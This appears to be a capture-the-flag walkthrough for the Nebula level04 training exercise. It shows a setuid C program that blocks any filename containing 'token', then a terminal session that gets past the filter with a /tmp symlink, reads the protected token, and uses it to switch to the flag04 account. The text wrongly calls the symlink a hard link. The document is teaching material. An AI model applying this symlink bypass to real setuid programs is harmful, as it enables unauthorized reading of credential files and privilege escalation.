Exploit Exercises: Nebula Level 04
This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)
To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.
Source code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
int main(int argc, char **argv, char **envp)
{
char buf[1024];
int fd, rc;
if(argc == 1) {
printf("%s [file to read]\n", argv[0]);
exit(EXIT_FAILURE);
}
if(strstr(argv[1], "token") != NULL) {
printf("You may not access '%s'\n", argv[1]);
exit(EXIT_FAILURE);
}
fd = open(argv[1], O_RDONLY);
if(fd == -1) {
err(EXIT_FAILURE, "Unable to open %s", argv[1]);
}
rc = read(fd, buf, sizeof(buf));
if(rc == -1) {
err(EXIT_FAILURE, "Unable to read fd %d", fd);
}
write(1, buf, rc);
}
Solution
After login we go to the flag account folder.
1
2
3
4
5
6
7
8
9
10
11
level04@nebula:~$ cd /home/flag04/
level04@nebula:/home/flag04$ ls -al
total 13
drwxr-x--- 2 flag04 level04 93 Nov 20 2011 .
drwxr-xr-x 1 root root 80 Aug 27 2012 ..
-rw-r--r-- 1 flag04 flag04 220 May 18 2011 .bash_logout
-rw-r--r-- 1 flag04 flag04 3353 May 18 2011 .bashrc
-rw-r--r-- 1 flag04 flag04 675 May 18 2011 .profile
-rwsr-x--- 1 flag04 level04 7428 Nov 20 2011 flag04
-rw------- 1 flag04 flag04 37 Nov 20 2011 token
level04@nebula:/home/flag04$
Hmm, let’s get more info by trying some basic commands.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
level04@nebula:/home/flag04$ ls -al
total 13
drwxr-x--- 2 flag04 level04 93 Nov 20 2011 .
drwxr-xr-x 1 root root 80 Aug 27 2012 ..
-rw-r--r-- 1 flag04 flag04 220 May 18 2011 .bash_logout
-rw-r--r-- 1 flag04 flag04 3353 May 18 2011 .bashrc
-rw-r--r-- 1 flag04 flag04 675 May 18 2011 .profile
-rwsr-x--- 1 flag04 level04 7428 Nov 20 2011 flag04
-rw------- 1 flag04 flag04 37 Nov 20 2011 token
level04@nebula:/home/flag04$ file flag04
flag04: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
level04@nebula:/home/flag04$ ./flag04
./flag04 [file to read]
level04@nebula:/home/flag04$ cat token
cat: token: Permission denied
level04@nebula:/home/flag04$ ./flag04 token
You may not access 'token'
level04@nebula:/home/flag04$
Permission denied. Really? Nope. Where do we control everything as any user? Well … In /tmp/ folder and as we did in previous tutorials hard link are hard link!
1
2
3
4
5
6
7
8
9
level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ls -la /tmp
total 0
drwxrwxrwt 4 root root 100 Oct 16 13:18 .
drwxr-xr-x 1 root root 220 Oct 16 2017 ..
drwxrwxrwt 2 root root 40 Oct 16 2017 .ICE-unix
drwxrwxrwt 2 root root 40 Oct 16 2017 .X11-unix
lrwxrwxrwx 1 level04 level04 18 Oct 16 13:17 level04 -> /home/flag04/token
level04@nebula:/home/flag04$
That funny moment when you see the “lrwxrwxrwx” as permission for your hard link. Let’s end this.
1
2
3
level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$
Now keep in mind that tokens in this exploit tutorial are used as passwords for the flag account.
1
2
3
4
5
6
7
level04@nebula:/home/flag04$ su flag04
Password:
sh-4.2$ id
uid=995(flag04) gid=995(flag04) groups=995(flag04)
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$
See you in the next tutorial. Share, Like and ask!